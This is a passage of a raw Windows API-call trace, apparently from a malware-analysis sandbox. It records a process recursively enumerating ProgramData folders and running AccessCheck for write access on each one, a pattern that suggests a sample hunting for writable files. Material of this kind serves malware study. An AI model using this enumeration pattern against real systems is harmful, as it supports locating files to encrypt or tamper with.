hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0105.854] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0105.854] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0105.854] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Adobe\\ARM\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0105.854] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe\\ARM", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0105.854] GetLastError () returned 0x7a [0105.854] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe\\ARM", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0xe8, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0105.854] GetLastError () returned 0x7a [0105.854] GetCurrentThread () returned 0xfffffffe [0105.854] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0105.854] GetCurrentProcess () returned 0xffffffff [0105.854] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x338) returned 1 [0105.854] DuplicateToken (in: ExistingTokenHandle=0x338, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x33c) returned 1 [0105.854] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0105.854] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x33c, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0105.854] CloseHandle (hObject=0x33c) returned 1 [0105.854] CloseHandle (hObject=0x338) returned 1 [0105.854] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0105.855] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0105.855] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0105.856] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0105.856] GetLastError () returned 0x7a [0105.856] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0", RequestedInformation=0x7, pSecurityDescriptor=0x571668, nLength=0xe8, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571668, lpnLengthNeeded=0x281b560) returned 1 [0105.856] GetLastError () returned 0x7a [0105.856] GetCurrentThread () returned 0xfffffffe [0105.856] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0105.856] GetCurrentProcess () returned 0xffffffff [0105.856] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x33c) returned 1 [0105.856] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x340) returned 1 [0105.856] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0105.856] AccessCheck (in: pSecurityDescriptor=0x571668, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0105.856] CloseHandle (hObject=0x340) returned 1 [0105.856] CloseHandle (hObject=0x33c) returned 1 [0105.856] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.856] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.856] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\18541\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0105.859] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\18541", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0105.859] GetLastError () returned 0x7a [0105.859] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\18541", RequestedInformation=0x7, pSecurityDescriptor=0x571668, nLength=0xe8, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x571668, lpnLengthNeeded=0x281afc8) returned 1 [0105.859] GetLastError () returned 0x7a [0105.859] GetCurrentThread () returned 0xfffffffe [0105.860] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0105.860] GetCurrentProcess () returned 0xffffffff [0105.860] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x340) returned 1 [0105.860] DuplicateToken (in: ExistingTokenHandle=0x340, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0105.860] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0105.860] AccessCheck (in: pSecurityDescriptor=0x571668, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0105.860] CloseHandle (hObject=0x344) returned 1 [0105.860] CloseHandle (hObject=0x340) returned 1 [0105.860] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.860] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.860] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.860] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.860] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.860] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0105.860] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0105.860] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.860] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.860] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.860] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.860] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.861] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.861] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0105.861] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0105.861] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0105.861] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0105.861] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0 [0105.861] FindClose (in: hFindFile=0x5fc2d8 | out: hFindFile=0x5fc2d8) returned 1 [0105.861] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0105.861] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0105.861] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0105.861] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0105.861] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0105.861] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\*", lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0x5fc2d8 [0105.861] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281c090) returned 0 [0105.861] GetLastError () returned 0x7a [0105.861] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft", RequestedInformation=0x7, pSecurityDescriptor=0x5727f0, nLength=0x94, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x5727f0, lpnLengthNeeded=0x281c090) returned 1 [0105.861] GetLastError () returned 0x7a [0105.861] GetCurrentThread () returned 0xfffffffe [0105.861] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x0) returned 0 [0105.861] GetCurrentProcess () returned 0xffffffff [0105.861] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x334) returned 1 [0105.861] DuplicateToken (in: ExistingTokenHandle=0x334, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281c094 | out: DuplicateTokenHandle=0x281c094*=0x338) returned 1 [0105.861] MapGenericMask (in: AccessMask=0x281c0a4, GenericMapping=0x281c074 | out: AccessMask=0x281c0a4) [0105.861] AccessCheck (in: pSecurityDescriptor=0x5727f0, ClientToken=0x338, DesiredAccess=0x120116, GenericMapping=0x281c074, PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c | out: PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c) returned 1 [0105.861] CloseHandle (hObject=0x338) returned 1 [0105.861] CloseHandle (hObject=0x334) returned 1 [0105.861] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0105.862] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0105.862] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Assistance\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0105.862] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Assistance", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0105.862] GetLastError () returned 0x7a [0105.862] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Assistance", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x8c, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0105.862] GetLastError () returned 0x7a [0105.862] GetCurrentThread () returned 0xfffffffe [0105.862] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0105.862] GetCurrentProcess () returned 0xffffffff [0105.862] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x338) returned 1 [0105.862] DuplicateToken (in: ExistingTokenHandle=0x338, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x33c) returned 1 [0105.862] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0105.862] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x33c, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0105.862] CloseHandle (hObject=0x33c) returned 1 [0105.862] CloseHandle (hObject=0x338) returned 1 [0105.862] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0105.862] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0105.862] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0105.862] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Assistance\\Client", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0105.863] GetLastError () returned 0x7a [0105.863] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Assistance\\Client", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x8c, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281b560) returned 1 [0105.863] GetLastError () returned 0x7a [0105.863] GetCurrentThread () returned 0xfffffffe [0105.863] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0105.863] GetCurrentProcess () returned 0xffffffff [0105.863] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x33c) returned 1 [0105.863] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x340) returned 1 [0105.863] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0105.863] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0105.863] CloseHandle (hObject=0x340) returned 1 [0105.863] CloseHandle (hObject=0x33c) returned 1 [0105.863] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.863] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.863] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0105.863] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0105.863] GetLastError () returned 0x7a [0105.863] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0", RequestedInformation=0x7, pSecurityDescriptor=0x571668, nLength=0x8c, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x571668, lpnLengthNeeded=0x281afc8) returned 1 [0105.863] GetLastError () returned 0x7a [0105.863] GetCurrentThread () returned 0xfffffffe [0105.863] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0105.863] GetCurrentProcess () returned 0xffffffff [0105.863] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x340) returned 1 [0105.863] DuplicateToken (in: ExistingTokenHandle=0x340, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0105.863] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0105.864] AccessCheck (in: pSecurityDescriptor=0x571668, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0105.864] CloseHandle (hObject=0x344) returned 1 [0105.864] CloseHandle (hObject=0x340) returned 1 [0105.864] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.864] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.864] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0x5fc3d8 [0105.900] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281aa30) returned 0 [0105.902] GetLastError () returned 0x7a [0105.902] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xa0, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281aa30) returned 1 [0105.902] GetLastError () returned 0x7a [0105.902] GetCurrentThread () returned 0xfffffffe [0105.902] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x0) returned 0 [0105.902] GetCurrentProcess () returned 0xffffffff [0105.902] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x348) returned 1 [0105.902] DuplicateToken (in: ExistingTokenHandle=0x348, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281aa34 | out: DuplicateTokenHandle=0x281aa34*=0x34c) returned 1 [0105.903] MapGenericMask (in: AccessMask=0x281aa44, GenericMapping=0x281aa14 | out: AccessMask=0x281aa44) [0105.903] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x34c, DesiredAccess=0x120116, GenericMapping=0x281aa14, PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c | out: PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c) returned 1 [0105.903] CloseHandle (hObject=0x34c) returned 1 [0105.903] CloseHandle (hObject=0x348) returned 1 [0105.903] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0105.903] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0105.903] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0105.903] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0105.903] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0105.903] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0105.903] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0105.903] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0105.903] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0 [0105.903] FindClose (in: hFindFile=0x5fc3d8 | out: hFindFile=0x5fc3d8) returned 1 [0105.906] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0105.907] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0105.907] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0105.907] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0105.907] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0105.907] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0105.907] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0105.907] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0105.907] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0105.908] GetLastError () returned 0x7a [0105.908] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x90, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0105.908] GetLastError () returned 0x7a [0105.908] GetCurrentThread () returned 0xfffffffe [0105.908] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0105.908] GetCurrentProcess () returned 0xffffffff [0105.908] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x338) returned 1 [0105.908] DuplicateToken (in: ExistingTokenHandle=0x338, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x33c) returned 1 [0105.908] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0105.908] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x33c, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0105.908] CloseHandle (hObject=0x33c) returned 1 [0105.908] CloseHandle (hObject=0x338) returned 1 [0105.908] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0105.908] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0105.908] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\23A8C7B1-0195-4D07-B6CF-93A6BF126B2A\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0105.908] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\23A8C7B1-0195-4D07-B6CF-93A6BF126B2A", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0105.908] GetLastError () returned 0x7a [0105.908] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\23A8C7B1-0195-4D07-B6CF-93A6BF126B2A", RequestedInformation=0x7, pSecurityDescriptor=0x5716a8, nLength=0x90, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x5716a8, lpnLengthNeeded=0x281b560) returned 1 [0105.909] GetLastError () returned 0x7a [0105.909] GetCurrentThread () returned 0xfffffffe [0105.909] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0105.909] GetCurrentProcess () returned 0xffffffff [0105.909] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x33c) returned 1 [0105.909] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x340) returned 1 [0105.909] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0105.909] AccessCheck (in: pSecurityDescriptor=0x5716a8, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0105.909] CloseHandle (hObject=0x340) returned 1 [0105.909] CloseHandle (hObject=0x33c) returned 1 [0105.909] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.909] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.909] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\23A8C7B1-0195-4D07-B6CF-93A6BF126B2A\\en-us.16\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0105.938] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\23A8C7B1-0195-4D07-B6CF-93A6BF126B2A\\en-us.16", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0105.938] GetLastError () returned 0x7a [0105.938] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\23A8C7B1-0195-4D07-B6CF-93A6BF126B2A\\en-us.16", 